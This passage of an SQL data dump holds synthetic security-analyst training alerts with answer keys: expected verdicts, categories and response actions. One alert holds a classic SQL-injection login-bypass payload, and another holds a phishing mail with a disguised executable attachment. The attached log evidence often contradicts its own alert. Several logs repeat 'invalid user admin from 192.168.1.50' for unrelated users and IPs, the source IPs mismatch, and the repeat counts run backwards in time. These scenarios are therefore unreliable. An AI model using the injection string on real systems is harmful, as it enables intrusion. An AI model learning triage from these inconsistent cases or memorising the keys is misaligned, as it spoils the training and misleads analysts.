ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1689, 'Unusual Login Attempt Detected', 'medium', 'Azure Sentinel', 'A login attempt from a previously unseen IP address was detected on an administrator account.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:12:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"10.2.2.20\",\"username\":\"administrator\",\"hostname\":\"adserver01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP previously reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"High-value target user account\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.2.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the administrative server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of unauthorized access confirms the attack vector.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1690, 'Failed SSH Login from Known Safe Network', 'low', 'Wazuh', 'A failed SSH login attempt was detected from a known safe network. No further activity was observed.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:23:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.0\",\"dst_ip\":\"10.0.0.10\",\"username\":\"user1\",\"hostname\":\"sshserver01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.0\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP belongs to a trusted network and shows no signs of malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the SSH server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is from a known safe network, indicating a benign activity.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1691, 'SQL Injection Attempt on Public-Facing Web Application', 'critical', 'Splunk', 'An SQL injection attempt was detected on the public-facing web application. The payload suggests an attempt to bypass authentication.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:11:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.50\",\"hostname\":\"webapp01\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 512 times for SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the web application\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection payload attempting authentication bypass\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a known SQL injection technique, confirming malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.990Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:11:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1692, 'Unusual Activity Detected: Possible Internal Reconnaissance', 'medium', 'Elastic SIEM', 'A series of failed login attempts from an internal IP indicates potential reconnaissance or credential stuffing.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:52:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.5.5.5\",\"dst_ip\":\"10.5.5.10\",\"username\":\"user2\",\"hostname\":\"host01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.5.5.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of suspected reconnaissance source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.5.5.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The pattern of activity suggests credential stuffing or reconnaissance.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.993Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:52:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.5.5.5\\\",\\\"dst_ip\\\":\\\"10.5.5.10\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"host01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1693, 'Phishing Attempt via Malicious Email Link', 'high', 'Proofpoint', 'An email containing a suspicious link was detected, potentially delivering phishing content.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:05:20Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"10.3.3.3\",\"username\":\"jane.smith\",\"hostname\":\"mailserver01\",\"request_body\":null,\"command_line\":null,\"email_sender\":\"phisher@example.com\",\"url\":\"http://malicious-link.com\"}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email domain used in previous phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in sending phishing emails\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious link\'s OSINT confirms phishing intent.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt via Malicious Email Link\",\"date\":\"2026-03-15T20:58:15.995Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1694, 'Failed SSH Login from Internal Network', 'low', 'Azure Sentinel', 'A failed SSH login attempt was logged from within the internal network, potentially indicating a user error.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"john.doe\",\"hostname\":\"sshserver02\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity originated from an internal IP with no signs of malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.996Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.1.15\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
